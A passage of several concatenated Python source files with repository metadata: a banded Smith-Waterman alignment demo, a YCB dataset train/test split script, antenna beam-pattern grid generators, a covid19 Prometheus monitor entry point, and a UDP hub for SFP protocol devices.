        max_score, max_score_row, max_score_column = 0, -1, -1
        # seeds store diagonals as (seq1 pos - seq2 pos); the band arithmetic
        # below works with the opposite sign
        diagonal *= -1
        upper_diagonal = diagonal + width
        lower_diagonal = diagonal - width
        # zero-filled matrices also cover the original explicit first-row /
        # first-column initialisation
        scoring_matrix = np.zeros((len(seq2) + 1, len(seq1) + 1))
        backtracking_matrix = np.zeros((len(seq2) + 1, len(seq1) + 1))
        # fill only the cells inside the band
        for row in range(1, len(seq2) + 1):
            lower_band = max(row - upper_diagonal, 1)
            upper_band = min(row - lower_diagonal, len(seq1)) + 1
            for column in range(lower_band, upper_band):
                score, score_origin = calculate_score_data(row, column, lower_band, upper_band, alphabet, substitution_matrix, scoring_matrix, seq1, seq2)
                if score > max_score:
                    max_score = score
                    max_score_row = row
                    max_score_column = column
                scoring_matrix[row][column] = score
                backtracking_matrix[row][column] = score_origin
        # keep the band with the best overall score
        if max_score > diagonal_max_score:
            diagonal_max_score = max_score
            diagonal_max_score_row = max_score_row
            diagonal_max_score_column = max_score_column
            diagonal_backtracking_matrix = backtracking_matrix
    indices = get_indices(diagonal_backtracking_matrix, diagonal_max_score_row, diagonal_max_score_column)
    return (diagonal_max_score, indices[0], indices[1])
def calculate_score_data(row, column, lower_band, upper_band, alphabet, substitution_matrix, scoring_matrix, seq1, seq2):
    """Compute the Smith-Waterman cell value for (row, column) inside the band.

    Candidate moves are diagonal (match/mismatch) and, when the neighbouring
    cell lies inside [lower_band, upper_band], left/up (gaps scored with the
    last column of the substitution matrix); scores are clamped at 0.

    Returns (best_score, origin) where origin is 8 = diagonal, 2 = up, 4 = left.
    """
    a = alphabet.index(seq1[column - 1])
    b = alphabet.index(seq2[row - 1])
    diag = scoring_matrix[row - 1][column - 1] + substitution_matrix[a][b]
    left = (scoring_matrix[row][column - 1] + substitution_matrix[a][-1]
            if lower_band <= column - 1 <= upper_band else -1)
    up = (scoring_matrix[row - 1][column] + substitution_matrix[b][-1]
          if lower_band <= row - 1 <= upper_band else -1)
    best = max(diag, up, left, 0)
    # tie-break order matches the original: diagonal, then up, then left
    if best == diag:
        origin = 8
    elif best == up:
        origin = 2
    else:
        origin = 4
    return (best, origin)
def get_indices(backtracking_matrix, row, column):
    """Trace the backtracking matrix from the max-score cell to recover the
    aligned index lists for both sequences.

    Origin codes: 8 = diagonal (consume a letter from both sequences),
    2 = up (gap in seq1), anything else = left (gap in seq2).

    NOTE(review): this function reads the module-level globals ``seq1`` and
    ``seq2`` rather than taking them as parameters -- it only works inside
    this script where those globals exist; confirm before reusing elsewhere.
    """
    seq1_indices = []
    seq2_indices = []
    seq1_alignment = ""
    seq2_alignment = ""
    # iterate through backtracking matrix starting with cell which has the max score
    # iterate while collecting indices for the best alignment for both sequences
    while row > 0 and column > 0:
        score_origin = backtracking_matrix[row][column]
        if score_origin == 8:
            # diagonal move: both sequences advance, record the matched indices
            seq1_alignment += seq1[column - 1]
            seq2_alignment += seq2[row - 1]
            row = row - 1
            column = column - 1
            seq1_indices.append(column)
            seq2_indices.append(row)
        elif score_origin == 2:
            # up move: gap inserted into seq1
            seq1_alignment += '-'
            seq2_alignment += seq2[row - 1]
            row = row - 1
        else:
            # left move (or unwritten cell): gap inserted into seq2
            seq1_alignment += seq1[column - 1]
            seq2_alignment += '-'
            column = column - 1
    seq1_indices.sort()
    seq2_indices.sort()
    # the alignments were built backwards during the traceback
    seq1_alignment = seq1_alignment[::-1]
    seq2_alignment = seq2_alignment[::-1]
    displayAlignment([seq1_alignment, seq2_alignment])
    return (seq1_indices, seq2_indices)
def displayAlignment(alignment):
    """Pretty-print a pairwise alignment: both strings plus a marker row that
    puts '|' under every position where the two characters agree.
    """
    top, bottom = alignment[0], alignment[1]
    # zip stops at the shorter string, matching the original min-length loop
    markers = "".join("|" if a == b else " " for a, b in zip(top, bottom))
    print('String1: ' + top)
    print(' ' + markers)
    print('String2: ' + bottom + '\n\n')
# --- demo driver ---------------------------------------------------------
# Alphabet and 5x5 substitution matrix; the extra last row/column holds the
# gap penalty for each letter (indexed with [-1] in the scoring code).
alphabet = "ABCD"
substitution_matrix = [[1, -5, -5, -5, -1],
                       [-5, 1, -5, -5, -1],
                       [-5, -5, 5, -5, -4],
                       [-5, -5, -5, 6, -4],
                       [-1, -1, -4, -4, -9]]
# example sequences sharing a common prefix/suffix with differing middles
seq1 = "DDCDDCCCDCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCDDDCDADCDCDCDCD"
seq2 = "DDCDDCCCDCBCCCCDDDCDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDCDCDCDCD"
alignments = heuralign(alphabet, substitution_matrix, seq1, seq2)
print("Score: ", alignments[0])
print("Indices: ", alignments[1], alignments[2])
yuxng/posecnn-pytorch | 16,045,997,827,370 | 47eb9e7ab79c046d06d536d83ead09d4678a5d4d | 4bb67e283093cc8c6b087b1be5be2393518e8da7 | /ycb_toolbox/compute_train_test_sets.py | 6da19b9322231b87c8222a1babec3a563b6e115d | [
"MIT"
]
| permissive | https://github.com/yuxng/posecnn-pytorch | cc6a0f88eebbfc6cde0948510d2ed3c74b75faea | 58ff2320eb97e458f4514bae2d7e4ac0e677024b | refs/heads/master | 2023-07-02T07:34:09.913514 | 2021-07-30T05:02:40 | 2021-07-30T05:02:40 | 149,823,279 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import os.path as osp
import numpy as np
import glob
import scipy.io
from ycb_globals import ycb_video
# Split the YCB_Self_Supervision scenes into test/train index files.
# For each top-level subdir, its scene folders are shuffled; the first half
# goes to the test split, the rest to cumulative train splits at 20/40/60/
# 80/100 percent. Per-class image counts are tallied from each scene's
# .mat annotations, and sorted scene lists are written under
# 'ycb_self_supervision/'.
this_dir = os.getcwd()
root_path = osp.join(this_dir, '..', 'data', 'YCB_Self_Supervision', 'data')
opt = ycb_video()
classes = opt.classes
num_scenes = 0
num_images = 0
num_classes = len(classes)
num_scenes_test = 0
num_images_test = 0
count_test = np.zeros((num_classes, ), dtype=np.int32)
# cumulative train fractions; split k contains all scenes with ind <= percentages[k]
percentages = [0.2, 0.4, 0.6, 0.8, 1.0]
num = len(percentages)
num_scenes_train = np.zeros((num, ), dtype=np.int32)
num_images_train = np.zeros((num, ), dtype=np.int32)
count_train = np.zeros((num_classes, num), dtype=np.int32)
scenes_train = [[] for i in range(num)]
scenes_test = []
scenes_all = []
# list subdirs
subdirs = os.listdir(root_path)
for i in range(len(subdirs)):
    subdir = subdirs[i]
    path_sub = osp.join(root_path, subdir)
    # list subsubdirs
    subsubdirs = [o for o in os.listdir(path_sub) if osp.isdir(osp.join(path_sub, o))]
    length = len(subsubdirs)
    # perturb
    # NOTE(review): np.random.permutation is unseeded, so the split differs
    # on every run -- seed it if the split must be reproducible.
    per = np.random.permutation(length)
    subsubdirs = [subsubdirs[i] for i in per]
    for j in range(length):
        subsubdir = subsubdirs[j]
        # scene lines are stored newline-terminated, ready for file writing
        folder = osp.join(subdir, subsubdir) + '\n'
        print(folder)
        scenes_all.append(folder)
        num_scenes += 1
        if j < length / 2:
            # first half of the shuffled scenes -> test split
            scenes_test.append(folder)
            is_train = 0
            num_scenes_test += 1
        else:
            # ind in (0, 1]: relative position within the train half
            if length == 1:
                ind = 1
            else:
                ind = float(j - length / 2) / float(length / 2)
            for k in range(num):
                if ind <= percentages[k]:
                    num_scenes_train[k] += 1
                    scenes_train[k].append(folder)
            is_train = 1
        folder = osp.join(root_path, subdir, subsubdir)
        filename = osp.join(folder, '*.mat')
        files = glob.glob(filename)
        # NOTE(review): the inner 'for k in range(num)' below shadows this
        # loop's k; harmless in Python's for semantics but easy to misread.
        for k in range(len(files)):
            filename = files[k]
            num_images += 1
            # load the annotation to see if the target object is in the image
            meta_data = scipy.io.loadmat(filename)
            cls_indexes = meta_data['cls_indexes'].flatten()
            if is_train:
                for k in range(num):
                    if ind <= percentages[k]:
                        count_train[cls_indexes - 1, k] += 1
                        num_images_train[k] += 1
            else:
                count_test[cls_indexes - 1] += 1
                num_images_test += 1
# report totals and per-class counts for every split
print('num of scenes: %d' % (num_scenes))
print('num of images: %d' % (num_images))
for k in range(num):
    print('=============training %.2f=================' % (percentages[k]))
    print('num of scenes: %d' % (num_scenes_train[k]))
    print('num of images: %d' % (num_images_train[k]))
    for i in range(num_classes):
        if count_train[i, k] > 0:
            print('%s: %d' % (classes[i], count_train[i, k]))
    print('==============================')
print('=============testing=================')
print('num of scenes: %d' % (num_scenes_test))
print('num of images: %d' % (num_images_test))
for i in range(num_classes):
    if count_test[i] > 0:
        print('%s: %d' % (classes[i], count_test[i]))
print('==============================')
# write index files
outdir = 'ycb_self_supervision'
filename = osp.join(outdir, 'test.txt')
scenes_test.sort()
with open(filename, 'w') as f:
    for i in range(len(scenes_test)):
        f.write(scenes_test[i])
# NOTE(review): the f.close() calls after the with-blocks are redundant --
# the context manager already closed the file.
f.close()
for i in range(num):
    scenes = scenes_train[i]
    filename = osp.join(outdir, 'train_%d.txt' % (i+1))
    scenes.sort()
    with open(filename, 'w') as f:
        for i in range(len(scenes)):
            f.write(scenes[i])
    f.close()
filename = osp.join(outdir, 'all.txt')
scenes_all.sort()
with open(filename, 'w') as f:
    for i in range(len(scenes_all)):
        f.write(scenes_all[i])
f.close()
XiaodongRencologne/FYST_HOLO | 16,166,256,934,546 | d1ae69c276d971f2a755702576476462eb7ed12c | a33ef12a873b8626b18bb0194a2fca809024c7cd | /Kirchhoffpy/BeamPattern.py | 17394a5bbb152b10eca1927ff94c340d2d2cf1ad | []
| no_license | https://github.com/XiaodongRencologne/FYST_HOLO | 707c08c11549a29c58bb9327d02d3628a7b2c73e | 07b39c56e56451c8e6579c81255516f5425c4fc5 | refs/heads/master | 2023-06-02T18:42:14.405286 | 2022-08-15T19:47:06 | 2022-08-15T19:47:06 | 379,660,118 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
#!/usr/bin/env python
# In[1]:
import numpy as np;
import matplotlib.pyplot as plt;
# In[22]:
'''1. square pattern'''
def squarePattern(u0, v0, urange, vrange, Nu, Nv, file='', distance='far', Type='on-axis'):
    """Write square beam-pattern sampling grids as (x, y, z) text files.

    A Nu x Nv grid spanning urange x vrange is sampled; z completes a unit
    direction vector (z = sqrt(1 - x^2 - y^2)). u0/v0 appear to be beam
    offsets in direction cosines -- TODO confirm. With distance='far' the
    unit vectors are written directly; otherwise they are scaled by
    *distance*. Returns 0 for the single on-axis beam, 1 for the four
    offset beams (pos/neg u0 x pos/neg v0).
    """
    uv = np.moveaxis(np.meshgrid(np.linspace(-urange / 2, urange / 2, Nu),
                                 np.linspace(-vrange / 2, vrange / 2, Nv)), 0, -1)
    u = uv[..., 0].ravel()
    v = uv[..., -1].ravel()
    if Type == 'on-axis':
        w = np.sqrt(1 - u ** 2 - v ** 2)
        if distance != 'far':
            u = distance * u
            v = distance * v
            w = distance * w
        np.savetxt(file + '/on-axis.txt',
                   np.concatenate((u, v, w)).reshape(3, -1).T, delimiter=',')
        return 0
    # four offset beams; order of the writes matches the original
    suffix = '_far' if distance == 'far' else '_near'
    scale = 1.0 if distance == 'far' else distance
    for tag, du, dv in (('pos_pos', u0, -v0), ('pos_neg', u0, v0),
                        ('neg_pos', -u0, -v0), ('neg_neg', -u0, v0)):
        x = u + du
        y = v + dv
        z = np.sqrt(1 - x ** 2 - y ** 2)
        grid = np.concatenate((x, y, z)).reshape(3, -1).T * scale
        np.savetxt(file + '/' + tag + suffix + '.txt', grid)
    return 1
'''2. plane field'''
def plane(sizex, sizey, Nx, Ny, distance, file=''):
    """Sample an Nx x Ny rectangular grid on the plane z = distance.

    Writes the points as rows of (x, y, z) to '<file>plane<distance>mm.txt'
    (*file* is used as a raw prefix -- no path separator is inserted).
    Always returns 1.
    """
    mesh = np.moveaxis(np.meshgrid(np.linspace(-sizex / 2, sizex / 2, Nx),
                                   np.linspace(-sizey / 2, sizey / 2, Ny)), 0, -1)
    px = mesh[..., 0].ravel()
    py = mesh[..., -1].ravel()
    pz = np.ones(px.size) * distance
    points = np.concatenate((px, py, pz)).reshape(3, -1).T
    np.savetxt(file + 'plane' + str(distance) + 'mm.txt', points)
    return 1
# In[ ]:
| UTF-8 | Python | false | false | 2,840 | py | 40 | BeamPattern.py | 15 | 0.530282 | 0.502465 | 0 | 95 | 28.852632 | 114 |
clambin/covid19mon | 6,622,839,597,753 | 214f97a464f157da01b5b46c18681b5ab2daa21e | 5d3f205eef66a1b9dd9c6112e197231b60ec9433 | /covid19/monitor/monitor.py | 376880b68e5f928d798b11cbc53c379835ccabb7 | [
"MIT"
]
| permissive | https://github.com/clambin/covid19mon | 4becb44f608edb119168402066e0b1ad1e3b9c59 | 78a2f7144f4b15c707208115ea99bea772eb95f6 | refs/heads/master | 2023-01-14T13:52:03.543914 | 2020-11-22T23:28:48 | 2020-11-22T23:28:48 | 260,452,755 | 0 | 0 | MIT | false | 2020-11-16T21:00:31 | 2020-05-01T12:22:01 | 2020-10-15T13:07:35 | 2020-11-16T21:00:31 | 255 | 0 | 0 | 0 | Python | false | false | import logging
from prometheus_client import start_http_server
from pimetrics.scheduler import Scheduler
from covid19.version import version
from covid19.monitor.configuration import print_configuration
from covid19.probes.population import PopulationProbe
from covid19.pgconnectors.population import PopulationPGConnector
from covid19.probes.covid import CovidCountryProbe, CovidLastUpdateProbe
from covid19.pgconnectors.covid import CovidPGConnector
def initialise(configuration):
    """Build the probe scheduler from the parsed configuration.

    With a postgres host configured, the population probe (daily) and the
    covid country probe get database connectors; without one, the covid
    probe runs without persistence. Returns the populated Scheduler.
    """
    scheduler = Scheduler()
    covidconn = None
    if configuration.postgres_host:
        # both connectors share the same connection parameters
        pg_kwargs = {
            'host': configuration.postgres_host,
            'port': configuration.postgres_port,
            'database': configuration.postgres_database,
            'user': configuration.postgres_user,
            'password': configuration.postgres_password,
        }
        # population data only needs a daily refresh
        scheduler.register(
            PopulationProbe(configuration.apikey, PopulationPGConnector(**pg_kwargs)),
            60 * 60 * 24
        )
        covidconn = CovidPGConnector(**pg_kwargs)
    scheduler.register(
        CovidCountryProbe(configuration.apikey, covidconn, configuration.pushgateway),
        configuration.interval
    )
    scheduler.register(
        CovidLastUpdateProbe(configuration.apikey),
        configuration.interval
    )
    return scheduler
def main(configuration):
    """Entry point: configure logging, expose metrics, and run the scheduler.

    Runs the probes once when configuration.once is set; otherwise loops
    forever with configuration.interval between runs. Returns 0.
    """
    level = logging.DEBUG if configuration.debug else logging.INFO
    logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S', level=level)
    logging.info(f'Starting covid19mon v{version}')
    logging.info(f'Configuration: {print_configuration(configuration)}')
    # expose the Prometheus metrics endpoint
    start_http_server(configuration.port)
    scheduler = initialise(configuration)
    if configuration.once:
        scheduler.run(once=True)
    else:
        while True:
            scheduler.run(duration=configuration.interval)
    return 0
| UTF-8 | Python | false | false | 2,136 | py | 32 | monitor.py | 23 | 0.717697 | 0.707865 | 0 | 58 | 35.827586 | 109 |
NicktheGreek1985/PythonCGIProjects | 15,324,443,312,186 | bcfc3637c9bfb32fbeb9f092105c65725e49d82d | dc0450275755946f39d232474df9e9e1bc38177f | /DBs Using Python CGI/Mondial/provinces_25.py | debba145566b573694e6cf2719faea2e28851665 | []
| no_license | https://github.com/NicktheGreek1985/PythonCGIProjects | aeb64adb8d7f3f761132de047a32c8107f77f382 | a7aff2dfd8fe95832759741f4c279c848619ee08 | refs/heads/master | 2021-09-03T10:00:44.526009 | 2018-01-08T07:18:17 | 2018-01-08T07:18:17 | 113,730,571 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# CGI script: renders an HTML table of Mondial countries.
# The HTTP header must be printed before any other output.
print('Content-type: text/html\n')
import cgi
import cgitb; cgitb.enable()
import sqlite3
from DB_Functions import *
mydb = 'mondial.db'
conn = sqlite3.connect(mydb)
cursor = conn.cursor()
startHTML('Mondial Database', 'stylesheet')
print('<h1>Twenty five Provinces</h1>')
print('<p>The following table lists the countries that have 25 provinces.</p>')
# NOTE(review): despite the heading, this query does NOT select countries
# with exactly 25 provinces -- it joins Province to Country on
# Province.area < Country.area, yielding one row per qualifying province
# (duplicate countries). A GROUP BY ... HAVING COUNT(*) = 25 was likely
# intended; confirm against the assignment.
cursor.execute('SELECT Country.name, Country.population, Country.area FROM Province INNER JOIN Country WHERE Province.country = Country.code AND Province.area < Country.area')
records = cursor.fetchall()
fields = ['Name','Population','Area']
print_Records(records, fields)
endHTML()
# NOTE(review): the connection itself is never closed (only the cursor).
cursor.close()
| UTF-8 | Python | false | false | 677 | py | 182 | provinces_25.py | 100 | 0.747415 | 0.738552 | 0 | 26 | 25.038462 | 175 |
strawbot/sfpPython | 13,288,628,858,624 | 54203c13fe68ca23b004096345a9e082e14b6803 | b5e309238b96f2c3de5a6b1dce0395ade6e4ccdd | /interface/ipHub.py | 089a981a2f37adc8775e8ad90c58a31013811959 | []
| no_license | https://github.com/strawbot/sfpPython | 3210255344cf8096efe503a2b2c792436c17b835 | 53d78beb02d6e450f392953ee8fec11d579fa648 | refs/heads/master | 2023-08-16T23:50:19.094276 | 2023-08-14T09:06:04 | 2023-08-14T09:06:17 | 87,775,168 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # support for TT over ip using UDP Robert Chapman Jul 24, 2018
# inputs periodically send frames to let TT know they can be connected to
from .interface import Hub, Port
import socket
import sys, traceback, errno
import time
from threading import Thread
from protocols import sfp, pids
# Hard-coded LAN address the hub socket binds to — presumably the host's own
# interface on the target network; TODO confirm / make configurable.
remote_ip = '192.168.0.9'
sfp_udp_port = 1337   # UDP port used for SFP traffic (bind + remote device sends)
udp_poll = .01        # socket receive timeout in seconds; doubles as the hub poll interval
udp_stale = 30        # seconds of inactivity before an unopened port is removed
class UdpPort(Port):
    """A Port whose traffic travels over the shared UDP socket owned by a UdpHub."""

    def __init__(self, address, name, hub):
        Port.__init__(self, address, name, hub)
        self._touch()

    def send_data(self, data):
        """Transmit *data* to this port's peer via the hub's socket."""
        self.hub.send_data(self.address, data)
        self._touch()

    def _touch(self):
        # Refresh the activity stamp. UdpHub reads/writes `timestamp`
        # directly to expire stale, never-opened ports, so the attribute
        # name must stay `timestamp`.
        self.timestamp = time.time()
class UdpHub(Hub):
    """Hub that discovers and services UdpPort peers over a single UDP socket.

    A background daemon thread owns the socket: it binds to
    (remote_ip, sfp_udp_port), reads datagrams, auto-creates a UdpPort the
    first time a new peer address is seen, and expires stale unopened ports.

    NOTE(review): `map(ord, data)` on recvfrom payloads and
    `''.join(map(chr, frame))` passed to sendto suggest this was written for
    Python 2 (str payloads); under Python 3 recvfrom returns bytes and
    sendto requires bytes — confirm target interpreter.
    """

    def __init__(self):
        Hub.__init__(self, name="UdpHub")
        # keep a list of ports by port number
        # Maps peer (host, port) address tuples -> UdpPort instances.
        self.devicePorts = {}
        t = Thread(name=self.name, target=self.run)
        t.setDaemon(True)
        t.start()  # run hub in thread

    def run(self):
        """Thread body: bind the socket and loop receiving datagrams.

        A socket timeout (udp_poll seconds) is used as the poll tick to
        sweep stale ports; any other exception terminates the loop.
        """
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            self.sock.bind((remote_ip, sfp_udp_port))
        except socket.error as e:
            # EADDRINUSE is tolerated (fall through and keep the socket);
            # any other bind error is reported and the thread exits.
            if e.errno != errno.EADDRINUSE:
                if e.errno == errno.EADDRNOTAVAIL:
                    print ('Remote ip {} is not availalbe'.format(remote_ip))
                else:
                    print(e)
                self.sock.close()
                return
        self.sock.settimeout(udp_poll)
        while True:
            try:
                data, address = self.sock.recvfrom(256)  # buffer size is 256 bytes
                # print "address:", address, "received message:", data
                self.receive_data(data, address)
            except socket.timeout:
                # Periodic tick: no traffic this interval; expire stale ports.
                self.update_port_list()
            except Exception as e:
                print(e, file=sys.stderr)
                traceback.print_exc(file=sys.stderr)
                print('Unknown exception, quitting udpPort')
                break
        self.sock.close()

    def receive_data(self, data, address):
        """Route an incoming datagram to an existing port, or create a new one.

        For a known, open port: forward non-beacon SFP packets to listeners.
        For an unknown address: derive a port name from the announcement
        packet payload (bytes 5.. appear to carry the name — TODO confirm
        against the SFP beacon layout), register the port, and reply with a
        directed EVAL frame.
        """
        port = self.devicePorts.get(address)
        if port:
            if port.is_open() and len(data):
                packet = sfp.sfpProtocol.getPacket(list(map(ord, data)))
                # Beacons are keep-alives; only real packets reach listeners.
                if len(packet) > 0 and packet[0] != pids.BEACON:
                    port.output.emit(data)
        else:
            packet = sfp.sfpProtocol.getPacket(list(map(ord, data)))
            if not packet:
                # Unparseable announcement: fall back to a generic name.
                name = 'UDP Port: {}'.format(address[1])
            else:
                name = ''.join(map(chr, packet[5:]))
            port = UdpPort(address, name, self)
            self.add_port(port)
            # Greet the device with a directed EVAL frame (0xd == CR).
            frame = sfp.sfpProtocol.makeFrame(pids.EVAL_PID, [pids.DIRECT, pids.UDP_HOST, 0xd])
            port.send_data(''.join(map(chr, frame)))
            port.timestamp = time.time()

    def update_port_list(self):
        """Drop unopened ports that have been silent longer than udp_stale seconds."""
        for port in self.ports():
            if not port.is_open():
                if time.time() - port.timestamp > udp_stale:
                    self.remove_port(port)

    def add_port(self, port):
        """Register *port*, reusing an existing port object if the name matches.

        Reuse lets a device that changed its UDP source address keep its
        established Port object (and any connected signals).
        """
        for checkPort in list(self.devicePorts.values()):
            if checkPort.name == port.name:
                self.remove_port(checkPort)
                checkPort.address = port.address
                port = checkPort
                break
        print('Adding UDP port {}'.format(port.name))
        super(UdpHub, self).add_port(port)
        self.devicePorts[port.address] = port

    def remove_port(self, port):
        """Unregister *port* from both the Hub and the address map."""
        print('Removing {}'.format(port.name))
        super(UdpHub, self).remove_port(port)
        self.devicePorts.pop(port.address)

    def send_data(self, address, data):
        # All ports share this one socket; *address* selects the peer.
        self.sock.sendto(data, address)
if __name__ == '__main__':
    # Manual smoke test: spin up a UdpHub inside a Qt event loop, fake a
    # remote device announcement, and verify the auto-created port opens.
    from PyQt4.QtCore import QCoreApplication, QTimer
    import sys

    class app(QCoreApplication):
        """Minimal Qt app that runs the test once via a zero-delay timer."""

        def __init__(self):
            QCoreApplication.__init__(self, [])
            self.timer = QTimer()
            self.timer.timeout.connect(self.test)
            self.timer.start(0)  # fire test() as soon as the event loop starts

        def didopen(self):
            print("port '{}' at address '{}' is open".format(self.port.name, self.port.address))

        def didclose(self):
            print("port '{}' closed".format(self.port.name))

        def remoteDevice(self):
            # Simulate a device announcing itself with a junk datagram;
            # the hub should create a fallback-named port for it.
            ip = '192.168.0.9'
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.sendto('helo', (ip, sfp_udp_port))
            sock.close()

        def test(self):
            try:
                jp = UdpHub()
                self.remoteDevice()
                # Give the hub thread time to receive and register the port.
                time.sleep(udp_poll+1)
                self.port = j = jp.get_port(jp.ports()[0].name)
                j.opened.connect(self.didopen)
                j.closed.connect(self.didclose)
                j.open()
                if j.is_open():
                    print("yes its open")
                else:
                    print("port not found")
                jp.close()
            finally:
                # Always stop the Qt event loop so the script terminates.
                self.quit()

    sys.exit(app().exec_())
| UTF-8 | Python | false | false | 5,013 | py | 31 | ipHub.py | 30 | 0.537403 | 0.528426 | 0 | 148 | 32.871622 | 96 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.